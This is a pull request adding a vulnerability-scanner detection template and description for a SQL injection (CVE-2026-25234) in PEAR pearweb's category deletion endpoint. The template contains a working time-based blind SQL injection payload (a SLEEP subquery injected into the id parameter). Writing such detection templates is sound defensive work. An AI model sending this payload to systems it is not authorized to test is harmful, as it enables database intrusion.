### PR TITLE
Add CVE-2026-25234 - PEAR pearweb SQL Injection in Category Deletion

### DIFF
--- a/http/cves/2026/CVE-2026-25234.yaml
+++ b/http/cves/2026/CVE-2026-25234.yaml
@@ -1,0 +1,44 @@
+id: CVE-2026-25234
+
+info:
+  name: PEAR pearweb < 1.33.0 - SQL Injection in Category Deletion
+  author: bswearingen
+  severity: critical
+  description: |
+    PEAR is a framework and distribution system for reusable PHP components. Prior to version 1.33.0, a SQL injection vulnerability in category deletion can allow an attacker with access to the category manager workflow to inject SQL via a category id. This issue has been patched in version 1.33.0.
+  impact: |
+    An attacker with category management access can inject arbitrary SQL, potentially extracting or modifying database contents.
+  remediation: |
+    Upgrade PEAR pearweb to version 1.33.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25234
+    - https://github.com/pear/pearweb
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-25234
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    vendor: pear
+    product: pearweb
+  tags: cve,cve2026,pear,pearweb,sqli
+
+http:
+  - raw:
+      - |
+        GET /admin/category-manager.php?action=delete&id=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(6)))a) HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+
+      - type: status
+        status:
+          - 200
+          - 302
+          - 500
+        condition: or


### PR DESCRIPTION
### Template Overview

This template detects CVE-2026-25234, a SQL injection vulnerability in PEAR pearweb's category management functionality.

### Vulnerability Details

**Product:** PEAR pearweb
**Affected Versions:** < 1.33.0
**Severity:** Critical (CVSS 9.8)
**CWE:** CWE-89 (SQL Injection)

The category deletion endpoint in the administration workflow does not properly sanitize the category ID parameter before using it in SQL queries. An attacker with access to the category manager can inject arbitrary SQL through a crafted category ID value.

### Detection Method

The template uses a time-based blind SQL injection technique via the category deletion endpoint, injecting a `SLEEP(6)` payload and measuring the response delay.

### References

- https://nvd.nist.gov/vuln/detail/CVE-2026-25234
- https://github.com/pear/pearweb